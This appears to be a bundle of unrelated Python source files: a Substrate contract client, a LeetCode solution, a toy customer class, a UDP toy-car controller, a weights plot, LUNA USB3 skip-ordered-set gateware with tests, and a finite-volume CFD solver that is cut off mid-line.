def __init__(self, contract_address: str, metadata: ContractMetadata = None, substrate: SubstrateInterface = None):
self.substrate = substrate
self.contract_address = contract_address
self.metadata = metadata
@classmethod
def create_from_address(cls, contract_address: str, metadata_file: str,
substrate: SubstrateInterface = None) -> "ContractInstance":
"""
Create a ContractInstance object that already exists on-chain providing a SS58-address and the path to the
metadata JSON of that contract
Parameters
----------
contract_address: SS58-address of contract
metadata_file: path to metadata JSON generated for contract
substrate
Returns
-------
ContractInstance
"""
metadata = ContractMetadata.create_from_file(metadata_file, substrate=substrate)
return cls(contract_address=contract_address, metadata=metadata, substrate=substrate)
def read(self, keypair: Keypair, method: str, args: dict = None,
value: int = 0, gas_limit: int = None, block_hash: str = None) -> GenericContractExecResult:
"""
Used to execute non-mutable messages to for example read data from the contract using getters. Can also be used
to predict gas limits and 'dry-run' the execution when a mutable message is used.
This method does not submit an extrinsic.
Parameters
----------
keypair
method: name of message to execute
args: arguments of message in {'name': value} format
value: value to send when executing the message
gas_limit: dict repesentation of `WeightV2` type
block_hash: hash of the block to execute the message on
Returns
-------
GenericContractExecResult
"""
input_data = self.metadata.generate_message_data(name=method, args=args)
# Execute runtime call in ContractsApi
call_result = self.substrate.runtime_call("ContractsApi", "call", {
'dest': self.contract_address,
'gas_limit': gas_limit,
'input_data': input_data.to_hex(),
'origin': keypair.ss58_address,
'value': value,
'storage_deposit_limit': None
}, block_hash)
if 'Error' in call_result['result']:
raise ContractReadFailedException(call_result.value['result']['Error'])
if 'Ok' in call_result['result']:
try:
return_type_string = self.metadata.get_return_type_string_for_message(method)
result_scale_obj = self.substrate.create_scale_object(return_type_string)
result_scale_obj.decode(ScaleBytes(call_result['result'][1]['data'].value_object))
call_result.value_object['result'].value_object[1].value_object['data'] = result_scale_obj
call_result.value['result']['Ok']['data'] = result_scale_obj.value
except NotImplementedError:
pass
return call_result
def exec(self, keypair: Keypair, method: str, args: dict = None,
value: int = 0, gas_limit: Optional[dict] = None, storage_deposit_limit: int = None,
wait_for_inclusion: bool = True, wait_for_finalization: bool = False
) -> ContractExecutionReceipt:
"""
Executes provided message by creating and submitting an extrinsic. To get a gas prediction or perform a
'dry-run' of executing this message, see `ContractInstance.read`.
Parameters
----------
keypair
method: name of message to execute
args: arguments of message in {'name': value} format
value: value to send when executing the message
gas_limit: dict repesentation of `WeightV2` type. When omited the gas limit will be calculated with a `read()`
storage_deposit_limit: The maximum amount of balance that can be charged to pay for the storage consumed
wait_for_inclusion: wait until extrinsic is included in a block (only works for websocket connections)
wait_for_finalization: wait until extrinsic is finalized (only works for websocket connections)
Returns
-------
ContractExecutionReceipt
"""
if gas_limit is None:
gas_predit_result = self.read(keypair, method, args, value)
gas_limit = gas_predit_result.gas_required
input_data = self.metadata.generate_message_data(name=method, args=args)
call = self.substrate.compose_call(
call_module='Contracts',
call_function='call',
call_params={
'dest': self.contract_address,
'value': value,
'gas_limit': gas_limit,
'storage_deposit_limit': storage_deposit_limit,
'data': input_data.to_hex()
}
)
extrinsic = self.substrate.create_signed_extrinsic(call=call, keypair=keypair)
receipt = self.substrate.submit_extrinsic(
extrinsic, wait_for_inclusion=wait_for_inclusion, wait_for_finalization=wait_for_finalization
)
return ContractExecutionReceipt.create_from_extrinsic_receipt(receipt, self.metadata)
|
class Solution:
def checkStraightLine(self, coordinates: List[List[int]]) -> bool:
x1 = coordinates[0][0]
y1 = coordinates[0][1]
x2 = coordinates[-1][0]
y2 = coordinates[-1][1]
try:
if x2 == x1:
for i in range(1,len(coordinates)-1):
if coordinates[i][0] != x1:
return False
m = ((x2-x1)/(y2-y1))
for i in range(1,len(coordinates)-1):
p = ((m)*(coordinates[i][1]-y1)) - (coordinates[i][0] - x1)
if p != 0.0:
return False
break
return True
except:
return
|
class Customer:
fname = ""
lname = ""
age = 0
def addCart(self):
print("add product to",self.fname,self.lname,self.age," 's cart")
customer1 = Customer()
customer1.fname = "Kosin"
customer1.lname = "Wangdee"
customer1.age = 46
customer1.addCart()
customer2 = Customer()
customer2.fname = "Kwanta"
customer2.lname = "Riewphaiboon"
customer2.age = 45
customer2.addCart()
customer3 = Customer()
customer3.fname = "Kiti"
customer3.lname = "Singhapat"
customer3.age = 58
customer3.addCart()
customer4 = Customer()
customer4.fname = "Thanachai"
customer4.lname = "Boonchum"
customer4.age = 36
customer4.addCart()
|
import socket
import sys
import struct
import select
# if we are on the compucar this will succeed
# if we are not, we enter debug mode
try:
import driver
DEBUG = False
except ImportError:
DEBUG = True
HOST = "127.0.0.1" if "--local" in sys.argv else sys.argv[1]
PORT = 3000
buff_size = 128
last_recived = 0
unpacker = struct.Struct("bbb")
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.bind((HOST, PORT))
s.setblocking(False)
print(f"Bound to {HOST}:{PORT} and{' ' if DEBUG else ' not '}running in debug mode")
while True:
r, _, _ = select.select([s], [], [], 1.0)
if not r:
stop = True
sys.stdout.write("\033[2K\033[1G")
print("lost connection", end='\r')
continue
else:
msg = s.recvfrom(buff_size)
msg = msg[0]
steering, speed, btns = unpacker.unpack(msg)
turbo = btns & 1
stop = (btns & 2) >> 1
if stop:
speed = 0
turbo = 0
steering = 0
if DEBUG:
sys.stdout.write("\033[2K\033[1G")
print(f"DEBUGING: {speed:03}, {steering:03}, {turbo}, {stop}", end="\r")
continue
if speed > 0:
driver.set_fast(turbo)
driver.set_value(driver.SPEED_PIN_FORWARD, speed)
elif speed == 0:
driver.set_value(driver.SPEED_PIN_FORWARD, 0)
driver.set_value(driver.SPEED_PIN_BACKWARD, 0)
else:
driver.set_fast(0)
driver.set_value(driver.SPEED_PIN_BACKWARD, -speed)
if steering > 0:
driver.set_value(driver.STEER_PIN_RIGHT, steering)
elif steering == 0:
driver.set_value(driver.STEER_PIN_LEFT, 0)
driver.set_value(driver.STEER_PIN_RIGHT, 0)
else:
driver.set_value(driver.STEER_PIN_LEFT, -steering)
sys.stdout.write("\033[2K\033[1G")
print(f"{speed:03}, {steering:03}, {turbo}, {stop}", end="\r")
|
__author__ = 'Justin'
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from numpy import mean
# Print Justin and Pablo's User Weights
weights = [0.55, 0.5, 0.55, 0.6000000000000001, 0.55, 0.55, 0.5, 0.45, 0.4, 0.4, 0.45, 0.45, 0.45, 0.5, 0.5, 0.45, 0.45, 0.5, 0.55, 0.55, 0.5, 0.55, 0.5, 0.5, 0.45, 0.45, 0.4, 0.4, 0.45, 0.5, 0.5, 0.5, 0.55, 0.55]
plt.plot(range(1,len(weights)+1,1),weights)
plt.xlabel('Iteration')
plt.ylabel('Zen Weight')
pablo_avg = mean(weights[5:-1])
weights = [0.55, 0.55, 0.6000000000000001, 0.55, 0.6000000000000001, 0.6500000000000001, 0.7000000000000002, 0.6500000000000001, 0.6000000000000001, 0.6500000000000001, 0.7000000000000002, 0.6500000000000001, 0.6500000000000001, 0.6000000000000001, 0.6000000000000001, 0.6500000000000001, 0.7000000000000002, 0.6500000000000001, 0.6000000000000001, 0.6000000000000001, 0.6500000000000001, 0.6000000000000001, 0.6500000000000001, 0.6500000000000001, 0.6000000000000001, 0.6000000000000001, 0.6500000000000001, 0.7000000000000002, 0.6500000000000001, 0.6500000000000001, 0.7000000000000002, 0.6500000000000001, 0.6000000000000001, 0.6000000000000001, 0.6500000000000001]
plt.plot(range(1,len(weights)+1,1),weights)
plt.xlabel('Iteration')
plt.ylabel('Zen Weight')
plt.title("Weight Regression")
justin_avg = mean(weights[5:-1])
pablo_patch = mpatches.Patch(color='blue', label="Pablo")
justin_patch = mpatches.Patch(color='green', label='Justin')
plt.legend(handles = [pablo_patch,justin_patch])
plt.plot(range(1,len(weights)+1,1),[pablo_avg for x in range(1,len(weights)+1,1)],'--',color='#737373')
plt.plot(range(1,len(weights)+1,1),[justin_avg for x in range(1,len(weights)+1,1)],'--',color='#737373')
plt.show()
|
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# Copyright (c) 2020 Florent Kermarrec <florent@enjoy-digital.fr>
#
# Code adapted from ``usb3_pipe``.
# SPDX-License-Identifier: BSD-3-Clause
""" Code for handling SKP ordered sets on the transmit and receive path.
SKP ordered sets are provided in order to give some "padding data" that can be removed
in order to handle differences in transmitter/receiver clock rates -- a process called
"clock tolerance compensation" (CTC). The actual insertion and removal of SKP ordered sets
for CTC is handled by the PHY -- but it only adds and removes sets where it needs to to
compensate for clock differences.
It's up to us to insert and remove additional ordered sets.
"""
import unittest
from amaranth import *
from .coding import SKP, stream_word_matches_symbol
from ...stream import USBRawSuperSpeedStream
from ....test.utils import LunaSSGatewareTestCase, ss_domain_test_case
class CTCSkipRemover(Elaboratable):
""" Clock Tolerance Compensation (CTC) receive buffer gateware.
It's functionally impossible to precisely synchronize the clocks for two independent
systems -- every specification has to allow for some difference in frequency between
the system's clocks (the "clock tolerance")
To compensate, high speed serial protocols inject 'filler' bytes called "SKP ordered sets",
which can be safely discarded. This allows the slower clock to catch up to the faster one.
[USB 3.2r1: 6.4.3].
Our PHY handles the core clock tolerance compesnation inside of its own clock domain; removing
these filler sets whenever removing them helps to keep the receiver and transmitter's clocks in sync.
This leaves behind the sets whose removal would not directly help with CTC.
This module removes those leftovers before data leaves the physical layer.
Attributes
----------
sink: USBRawSuperSpeedStream(), input stream
The stream from which SKP ordered sets should be removed.
source: USBRawSuperSpeedStream(), output stream
The relevant stream with SKP ordered sets removed. Note that past this point,
``stream.valid`` can and will sometimes be false.
skip_removed: Signal(), output
Strobe that indicates that a SKP ordered set was removed.
"""
def __init__(self):
#
# I/O port
#
self.sink = USBRawSuperSpeedStream()
self.source = USBRawSuperSpeedStream()
self.skip_removed = Signal()
self.bytes_in_buffer = Signal(range(len(self.sink.ctrl) + 1))
def elaborate(self, platform):
m = Module()
sink = self.sink
source = self.source
bytes_in_stream = len(sink.ctrl)
#
# Find SKP symbols
#
# Identify the locations of any SKP symbols present in the stream.
skp_locations = Signal(bytes_in_stream)
for i in range(bytes_in_stream):
m.d.comb += skp_locations[i].eq(stream_word_matches_symbol(sink, i, symbol=SKP))
# If we've found one, indicate that we're removing it.
skip_found = self.sink.valid & self.sink.ready & (skp_locations != 0)
m.d.comb += self.skip_removed.eq(skip_found)
#
# Data Extractor
#
# We'll first extract the data and control bits for every position that doesn't contain a SKP.
valid_data = Signal.like(sink.data)
valid_ctrl = Signal.like(sink.ctrl)
valid_byte_count = Signal(range(0, bytes_in_stream + 1))
# We have a SKIP location for each byte; and each locations has two possible values
# (SKP, no SKP); and therefore we have 2 ** <bytes> distinct arrangements.
possible_arrangement_count = 2 ** bytes_in_stream
possible_arrangements = range(possible_arrangement_count)
# We'll handle each possibility with a programmatically generated case.
with m.Switch(skp_locations):
# We'll generate a single case for each possible "skip mask".
for skip_mask in possible_arrangements:
with m.Case(skip_mask):
data_fragments = []
ctrl_fragments = []
# We'll iterate over each of our possible positions, and gather
# the Amaranth signals associated with the non-skip values in the
# relevant position.
for position in range(bytes_in_stream):
# If this case would have a valid byte at the given position, grab it.
position_mask = 1 << position
if (position_mask & skip_mask) == 0:
data_signal_at_position = sink.data.word_select(position, 8)
ctrl_signal_at_position = sink.ctrl[position]
data_fragments.append(data_signal_at_position)
ctrl_fragments.append(ctrl_signal_at_position)
# If there are any valid data signals associated with the given position,
# coalesce the data and control signals into a single word, which we'll handle below.
if data_fragments:
m.d.comb += [
valid_data.eq(Cat(*data_fragments)),
valid_ctrl.eq(Cat(*ctrl_fragments)),
valid_byte_count.eq(len(data_fragments)),
]
#
# Elastic Buffer / Valid Data Coalescence
#
# We now have a signal that contains up to a valid word of data. We'll need to
# stitch this data together before we can use it. To do so, we'll use a shift
# register long enough to store two complete words of data -- one for the word
# we're outputting, and one for a word-in-progress.
# This shift register serves as a local "elastic buffer" -- we can add in data in
# bits and pieces, and remove it in bits and pieces.
buffer_size_bytes = bytes_in_stream * 2
# Create our internal shift register, as well as our current fill counter.
data_buffer = Signal(buffer_size_bytes * 8)
ctrl_buffer = Signal(buffer_size_bytes)
bytes_in_buffer = Signal(range(0, buffer_size_bytes + 1))
# Determine if we'll have a valid stream
m.d.comb += sink.ready.eq(bytes_in_buffer <= buffer_size_bytes)
# If we're receiving data this round, add it into our shift register.
with m.If(sink.valid & sink.ready):
# Compute how many bytes we'll have next cycle: it's the number of bytes we already have
# (bytes_in_buffer) plus the bytes we're adding (valid_byte_count) and minus the data we're
# about to remove (one word, or bytes_in_stream) if we're reading, or minus nothing if we're not.
with m.If(source.valid & source.ready):
m.d.ss += bytes_in_buffer.eq(bytes_in_buffer + valid_byte_count - bytes_in_stream)
with m.Else():
m.d.ss += bytes_in_buffer.eq(bytes_in_buffer + valid_byte_count)
# Handle our shift register pushing logic.
with m.Switch(valid_byte_count):
# Our simplest case: we have no data in the buffer; and nothing needs to change.
with m.Case(0):
pass
# In every other case, we have some data to be added to the buffer.
# We'll do the math slightly differently for each potential number of bytes.
for i in range(1, bytes_in_stream + 1):
with m.Case(i):
# Grab our existing data, and stick it onto the end of the shift register.
m.d.ss += [
data_buffer .eq(Cat(data_buffer[8*i:], valid_data[0:8*i])),
ctrl_buffer .eq(Cat(ctrl_buffer[1*i:], valid_ctrl[0:1*i])),
]
# If we're not receiving data, but we -are- removing it, we'll just update our total
# valid data counter to account for the removal.
with m.Elif(source.valid & source.ready):
m.d.ss += bytes_in_buffer.eq(bytes_in_buffer - bytes_in_stream)
#
# Data output
#
# We'll output a word each time we have enough data in our shift register toS
# output a full word.
m.d.comb += source.valid.eq(bytes_in_buffer >= bytes_in_stream)
# Our data ends in different places depending on how many bytes we
# have in our shift register; so we'll need to pop it from different locations.
with m.Switch(bytes_in_buffer):
for i in range(bytes_in_stream, bytes_in_stream * 2):
with m.Case(i):
# Grab the relevant word from the end of the buffer.
word_position = 8 - i
m.d.comb += [
source.data.eq(data_buffer[8 * word_position : 8 * (word_position + bytes_in_stream)]),
source.ctrl.eq(ctrl_buffer[1 * word_position : 1 * (word_position + bytes_in_stream)]),
]
#
# Diagnostic output.
#
m.d.comb += self.bytes_in_buffer.eq(bytes_in_buffer)
return m
class CTCSkipRemoverTest(LunaSSGatewareTestCase):
FRAGMENT_UNDER_TEST = CTCSkipRemover
def initialize_signals(self):
# Set up our streams to always ferry data in and out, where possible.
yield self.dut.sink.valid.eq(1)
yield self.dut.source.ready.eq(1)
def provide_input(self, data, ctrl):
yield self.dut.sink.data.eq(data)
yield self.dut.sink.ctrl.eq(ctrl)
yield
@ss_domain_test_case
def test_dual_skip_removal(self):
source = self.dut.source
# When we add data into the buffer...
yield from self.provide_input(0xAABBCCDD, 0b0000)
# ... we should see our line go valid only after four bytes are collected.
self.assertEqual((yield source.valid), 0)
yield from self.provide_input(0x71BA3C3C, 0b0011)
# Once it does go high, it should be accompanied by valid input data.
self.assertEqual((yield source.valid), 1)
self.assertEqual((yield source.data), 0xAABBCCDD)
self.assertEqual((yield source.ctrl), 0)
yield from self.provide_input(0x11223344, 0b1100)
# If data with SKPs were provided, our output should be invalid, until we
# receive enough bytes to have four non-skip bytes.
self.assertEqual((yield source.valid), 0)
# Once we do, we should see a copy of our data without the SKPs included.
yield
self.assertEqual((yield source.data), 0x334471BA)
self.assertEqual((yield source.ctrl), 0)
yield
self.assertEqual((yield source.data), 0x33441122)
self.assertEqual((yield source.ctrl), 0b11)
@ss_domain_test_case
def test_shifted_dual_skip_removal(self):
source = self.dut.source
# When we add data into the buffer...
yield from self.provide_input(0xAABBCCDD, 0b0000)
# ... we should see our line go valid only after four bytes are collected.
self.assertEqual((yield source.valid), 0)
yield from self.provide_input(0x713C3CBA, 0b0110)
# Once it does go high, it should be accompanied by valid input data.
self.assertEqual((yield source.valid), 1)
self.assertEqual((yield source.data), 0xAABBCCDD)
self.assertEqual((yield source.ctrl), 0)
yield from self.provide_input(0x113C3C44, 0b0110)
# If data with SKPs were provided, our output should be invalid, until we
# receive enough bytes to have four non-skip bytes.
self.assertEqual((yield source.valid), 0)
# Once we do, we should see a copy of our data without the SKPs included.
yield from self.provide_input(0x55667788, 0b0000)
self.assertEqual((yield source.data), 0x114471BA)
self.assertEqual((yield source.ctrl), 0)
yield
self.assertEqual((yield source.data), 0x55667788)
self.assertEqual((yield source.ctrl), 0)
@ss_domain_test_case
def test_single_skip_removal(self):
source = self.dut.source
# When we add data into the buffer...
yield from self.provide_input(0xAABBCCDD, 0b0000)
# ... we should see our line go valid only after four bytes are collected.
self.assertEqual((yield source.valid), 0)
yield from self.provide_input(0x3C556677, 0b1000)
# Once it does go high, it should be accompanied by valid input data.
self.assertEqual((yield source.valid), 1)
self.assertEqual((yield source.data), 0xAABBCCDD)
self.assertEqual((yield source.ctrl), 0)
yield from self.provide_input(0x11223344, 0b1100)
# If data with SKPs were provided, our output should be invalid, until we
# receive enough bytes to have four non-skip bytes.
self.assertEqual((yield source.valid), 0)
# Once we do, we should see a copy of our data without the SKPs included.
yield
self.assertEqual((yield source.data), 0x44556677)
self.assertEqual((yield source.ctrl), 0)
yield
self.assertEqual((yield source.data), 0x44112233)
self.assertEqual((yield source.ctrl), 0b110)
@ss_domain_test_case
def test_cycle_spread_skip_removal(self):
source = self.dut.source
# When we add data into the buffer...
yield from self.provide_input(0xAABBCCDD, 0b0000)
# ... we should see our line go valid only after four bytes are collected.
self.assertEqual((yield source.valid), 0)
yield from self.provide_input(0x3C556677, 0b1000)
# Once it does go high, it should be accompanied by valid input data.
self.assertEqual((yield source.valid), 1)
self.assertEqual((yield source.data), 0xAABBCCDD)
self.assertEqual((yield source.ctrl), 0)
yield from self.provide_input(0x1122333C, 0b0001)
# If data with SKPs were provided, our output should be invalid, until we
# receive enough bytes to have four non-skip bytes.
self.assertEqual((yield source.valid), 0)
# Once we do, we should see a copy of our data without the SKPs included.
yield from self.provide_input(0x44556677, 0b0000)
self.assertEqual((yield source.data), 0x33556677)
self.assertEqual((yield source.ctrl), 0)
yield
self.assertEqual((yield source.data), 0x66771122)
self.assertEqual((yield source.ctrl), 0b0)
class CTCSkipInserter(Elaboratable):
""" Clock Tolerance Compensation (CTC) Skip insertion gateware.
See the ``CTCSkipRemover`` for a description of CTC and its general operation.
Our PHY handles the core clock tolerance compesnation inside of its own clock domain; adding
Skip sets whenever adding them helps to keep the transmitter's elastic buffer from running low
on data. However, we still need to add in our own Skip ordered sets so the other side of the link
has enough to perform its own CTC adjustments.
This module adds ordered sets, per the USB standard.
Attributes
----------
sink: USBRawSuperSpeedStream(), input stream
The stream into which SKP ordered sets should be inserted.
source: USBRawSuperSpeedStream(), output stream
The relevant stream with SKP ordered sets inserted.
can_send_skip: Signal(), input
Controls when SKPs can be inserted. This should be asserted when we're transmitting
logical idle.
sending_skip: Signal(), output
Indicates that we're currently sending only SKP characters; and thus our scrambler
should not advance.
"""
SKIP_BYTE_LIMIT = 354
def __init__(self):
#
# I/O port
#
self.sink = USBRawSuperSpeedStream()
self.source = USBRawSuperSpeedStream()
self.can_send_skip = Signal()
self.sending_skip = Signal()
def elaborate(self, platform):
m = Module()
sink = self.sink
source = self.source
#
# SKP scheduling.
#
# The largest amount of pending SKP ordered sets can right before finishing transmitting:
# (20 bytes of DPH) + (1036 bytes of DPP) + (6 bytes of SKP)
# This sequence is 1062, or 354*3, bytes long. Since we only transmit pairs of SKP ordered sets,
# the maximum amount of pending SKP ordered sets at any time is 4.
skips_to_send = Signal(range(5))
skip_needed = Signal()
# Precisely count the amount of skip ordered sets that will be inserted at the next opportunity.
# From [USB3.0r1: 6.4.3]: "The non-integer remainder of the Y/354 SKP calculation shall not be
# discarded and shall be used in the calculation to schedule the next SKP Ordered Set."
with m.If(skip_needed & ~self.sending_skip):
m.d.ss += skips_to_send.eq(skips_to_send + 1)
with m.If(~skip_needed & self.sending_skip):
m.d.ss += skips_to_send.eq(skips_to_send - 2)
with m.If(skip_needed & self.sending_skip):
m.d.ss += skips_to_send.eq(skips_to_send - 1)
#
# SKP insertion timing.
#
bytes_per_word = len(self.sink.ctrl)
data_bytes_elapsed = Signal(range(self.SKIP_BYTE_LIMIT))
# Count each byte of data we send...
with m.If(sink.valid & sink.ready):
m.d.ss += data_bytes_elapsed.eq(data_bytes_elapsed + bytes_per_word)
# ... and once we see enough data, schedule insertion of a skip ordered set.
with m.If(data_bytes_elapsed + bytes_per_word >= self.SKIP_BYTE_LIMIT):
m.d.ss += data_bytes_elapsed.eq(data_bytes_elapsed + bytes_per_word - self.SKIP_BYTE_LIMIT)
m.d.comb += skip_needed.eq(1)
#
# SKP insertion.
#
# Finally, if we can send a skip this cycle and need to, replace our IDLE with two SKP ordered sets.
#
# Although [USB3.0r1: 6.4.3] allows "during training only [...] the option of waiting to insert 2 SKP
# ordered sets when the integer result of Y/354 reaches 2", inserting individual SKP ordered sets on
# a 32-bit data path has considerable overhead, and we only insert pairs.
with m.If(self.can_send_skip & (skips_to_send >= 2)):
m.d.comb += self.sending_skip.eq(1)
m.d.ss += [
source.valid .eq(1),
source.data .eq(Repl(SKP.value_const(), len(source.ctrl))),
source.ctrl .eq(Repl(SKP.ctrl_const(), len(source.ctrl))),
]
with m.Else():
m.d.ss += [
self.source .stream_eq(self.sink),
]
return m
if __name__ == "__main__":
unittest.main()
|
'''
Created on Feb 6, 2012
@author: bogdan hlevca 995151213
'''
#import numerical Python for Matrix operations
import numpy
import SIMPLE
import linalg
#import the TDMA module
from thomas import *
#import the graphi library
import matplotlib.pyplot as plt
# Create a mesh class that holds a vector of nodes
#Class definition
class FinVol_2D_Conv_Diff(object):
'''
Solve the equation:
d/dx(rho*u*Fi) + d/dy(ro*v*Fi) = d/dx(Gamma* dFi/dx)+d/dy(Gamma* dFi/dy)
where
d is the partial difference d_rond
F - stands for the property Fi
'''
@classmethod
def plot3curves(cls, FiCD, FiUD, FiQU):
'''
Plots comparative values on the diagonal of the square
'''
fig = plt.figure(1, facecolor = 'w', edgecolor = 'k') #prepare the plotting environment
ax = fig.add_subplot(111)
#create the figure and axes object
# Creating the grid of coordinates x,y
x = range(0, FiCD.size) #create the x, and y divisions
#draw only the contours
cs = ax.plot(x, FiCD, x, FiUD, x, FiQU) # plot diagonal values
ax.legend(('Central Differences', 'Upwind Differences', 'QUICK'))
plt.show()
#end plot3curves
#constructor object initializes the class arrays and calculates preliminary coefficients
def __init__(self, var, FiBound, p, simple):
'''
Constructor
'''
self.debug = simple.debug
self.simple = simple
self.var = var
self.W = 0
self.E = 1
self.N = 2
self.S = 3
self.urf = 0.7 #underrelaxation factor
self.Gamma = numpy.zeros(4)
self.A = numpy.zeros(4)
self.Df = numpy.zeros(4)
self.deltaX = None
self.deltaY = None
#iterative error accepted
self.EPSILON = 1e-7
self.maxiter = 10000
self.Fi0E = FiBound[self.E]
self.Fi0N = FiBound[self.N]
self.Fi0W = FiBound[self.W]
self.Fi0S = FiBound[self.S]
self.Lx = simple.Lx
self.Ly = simple.Ly
self.Nx = simple.Nx
self.Ny = simple.Ny
self.p = p
self.rho = simple.rho
self.scheme = simple.scheme
self.initNodes() #initialize node coefficients
self.calculateGamma(simple.Gx, simple.Gy) #calculate preliminary information, Gamma, deltaX and Y and the control volume area
self.calculateDelta()
self.calculateA()
# convection terms are provided from outside by simple
# self.calculate_F()
self.calculate_Df()
if self.simple.lc.CPP == True:
self.cls = linalg.CppBlas()
#end __init__
def initNodes(self):
'''
initialize node coefficients and TDMA coefficients
'''
#init the nodes
#must have their own coefficients as they differ for various variables
self.aW = numpy.zeros((self.Ny, self.Nx))
self.aE = numpy.zeros((self.Ny, self.Nx))
self.aN = numpy.zeros((self.Ny, self.Nx))
self.aS = numpy.zeros((self.Ny, self.Nx))
self.aP = numpy.zeros((self.Ny, self.Nx))
self.aWW = numpy.zeros((self.Ny, self.Nx))
self.aEE = numpy.zeros((self.Ny, self.Nx))
self.aNN = numpy.zeros((self.Ny, self.Nx))
self.aSS = numpy.zeros((self.Ny, self.Nx))
#init Su sources
self.SuN = numpy.zeros((self.Ny, self.Nx))
self.SuS = numpy.zeros((self.Ny, self.Nx))
self.SuE = numpy.zeros((self.Ny, self.Nx))
self.SuW = numpy.zeros((self.Ny, self.Nx))
#init Sp sources
self.SpN = numpy.zeros((self.Ny, self.Nx))
self.SpS = numpy.zeros((self.Ny, self.Nx))
self.SpE = numpy.zeros((self.Ny, self.Nx))
self.SpW = numpy.zeros((self.Ny, self.Nx))
#init with zero the solution matrix
self.Fi = numpy.zeros((self.Ny, self.Nx))
self.FiOld = numpy.zeros((self.Ny, self.Nx))
#initialize with values from previous run if any
if self.var == "u":
self.Fi = self.simple.ustar.copy()
elif self.var == "v":
self.Fi = self.simple.vstar.copy()
else:
print "Wrong variable passed"
raise NameError("Wrong variable passed")
#set the old values as current
self.FiOld = self.Fi.copy()
#convection terms
self.F = self.simple.F
self.FOld = self.simple.FOld
#the TDMA coeficients. (We calculate vertical lines (columns = > allocate the number of horizontal lines)
self.alp = numpy.zeros(self.Ny)
self.bet = numpy.zeros(self.Ny)
self.D = numpy.zeros(self.Ny)
self.C = numpy.zeros(self.Ny)
def calculateGamma(self, GammaX, GammaY):
'''
calculate preliminary information, Gamma
'''
self.Gamma[self.W] = self.Gamma[self.E] = GammaY
self.Gamma[self.N] = self.Gamma[self.S] = GammaX
def calculateA(self):
'''
calculate preliminary information, control volume area
'''
if self.Nx == 1:
self.A[self.W] = self.A[self.E] = 1
self.A[self.N] = self.A[self.S] = 1
else:
self.A[self.W] = self.A[self.E] = self.deltaY
self.A[self.N] = self.A[self.S] = self.deltaX
def calculateDelta(self):
'''
calculate preliminary information, deltaX and Y
'''
self.deltaX = self.Lx / self.Nx
self.deltaY = self.Ly / self.Ny
def calculate_F(self):
'''unsteady flow F is NOT constant
'''
self.simple.calculate_F()
#end Calculate_F
def calculate_Df(self):
'''
calculate the diffusion coeff D
'''
self.Df[self.W] = self.Gamma[self.W] * self.A[self.W] / self.deltaX
self.Df[self.E] = self.Gamma[self.E] * self.A[self.E] / self.deltaX
self.Df[self.S] = self.Gamma[self.S] * self.A[self.S] / self.deltaY
self.Df[self.N] = self.Gamma[self.N] * self.A[self.N] / self.deltaY
print "***********************"
print "Df on boundary set to 0"
print "***********************"
if self.scheme == "QUICK":
self.D0W = self.Df[self.W]
self.D0E = self.Df[self.E]
self.D0S = self.Df[self.S]
self.D0N = self.Df[self.N]
else:
self.D0W = 2 * self.Df[self.W]
self.D0E = 2 * self.Df[self.E]
self.D0S = 2 * self.Df[self.S]
self.D0N = 2 * self.Df[self.N]
#end calculate_D
def calculate_alpha(self, j, i):
if self.F[self.W, j, i] > 0:
self.Alpha_w = 1
else :
self.Alpha_w = 0
if self.F[self.E, j, i] > 0:
self.Alpha_e = 1
else :
self.Alpha_e = 0
if self.F[self.S, j, i] > 0:
self.Alpha_s = 1
else :
self.Alpha_s = 0
if self.F[self.N, j, i] > 0:
self.Alpha_n = 1
else :
self.Alpha_n = 0
#end calculate_alpha
def setBoundaryConditions(self):
for i in range(0, self.Nx):
for j in range(0, self.Ny):
#west
if i == 0:
self.Fi[j, i] = self.Fi0W
#east
if i == self.Nx - 1:
self.Fi[j, i] = self.Fi0E
#north
if j == self.Ny - 1:
self.Fi[j, i] = self.Fi0N
#south
if j == 0:
self.Fi[j, i] = self.Fi0S
#end set BoundaryConditions
# set of functions to account for the cardinal values of the main feature Fi
def FiW(self, j, i):
#FiW
if i == 0:
FiW = self.Fi0W
else:
FiW = self.Fi[j, i - 1]
return FiW
def FiE(self, j, i):
if i == self.Nx - 1:
FiE = self.Fi0E
else:
FiE = self.Fi[j, i + 1]
return FiE
def FiS(self, j, i):
if j == 0:
FiS = self.Fi0S
else:
FiS = self.Fi[j - 1, i]
return FiS
def FiN(self, j, i):
if j == self.Ny - 1:
FiN = self.Fi0N
else:
FiN = self.Fi[j + 1, i]
return FiN
def FiWW(self, j, i):
if i == 0:
FiWW = 0#2 * self.Fi0W - self.Fi[j, i]
elif i == 1:
FiWW = self.Fi0W
else:
FiWW = self.Fi[j, i - 2]
return FiWW
def FiEE(self, j, i):
if i == self.Nx - 1 :
FiEE = 0 #2 * self.Fi0E - self.Fi[j, i]
elif i == self.Nx - 2:
FiEE = self.Fi0E
else:
FiEE = self.Fi[j, i + 2]
return FiEE
def FiSS(self, j, i):
if j == 0:
FiSS = 0 #2 * self.Fi0S - self.Fi[j, i]
elif j == 1:
FiSS = self.Fi0S
else:
FiSS = self.Fi[j - 2, i]
return FiSS
def FiNN(self, j, i):
if j == self.Ny - 1 :
FiNN = 0 # 2 * self.Fi0N - self.Fi[j, i]
elif j == self.Ny - 2:
FiNN = self.Fi0N
else:
FiNN = self.Fi[j + 2, i]
return FiNN
def calculate_C(self, j, i, aW, FiW, aE, FiE, Su, p , var):
if (var == "u"):
return aW[j, i] * FiW(j, i) + aE[j, i] * FiE(j, i) + (self.simple.pw(p, j, i) - self.simple.pe(p, j, i)) * self.A[self.E] + Su
elif (var == "v"):
return aW[j, i] * FiW(j, i) + aE[j, i] * FiE(j, i) + (self.simple.ps(p, j, i) - self.simple.pn(p, j, i)) * self.A[self.N] + Su
def calculateTDMACoefficients(self, i):
'''
book pag 220
Apply TDMA S to N sweeping W to E
The discretization equation is given by
In the book they have it reversed "j" is for lines and "i" for columns
'''
#calculate on each vertical from S -> N
for j in range(0, self.Ny):
#Compute the TDMA coefficients
self.alp[j] = self.aN[j, i].copy()
self.bet[j] = self.aS[j, i].copy()
self.D[j] = self.aP[j, i].copy()
#the free term
#Avoid problems at boundaries by calling a function which considers the boundary limitation on index
#boundary conditions are set through the term C[j]
Su = self.SuW[j, i] + self.SuE[j, i] + self.SuS[j, i] + self.SuN[j, i]\
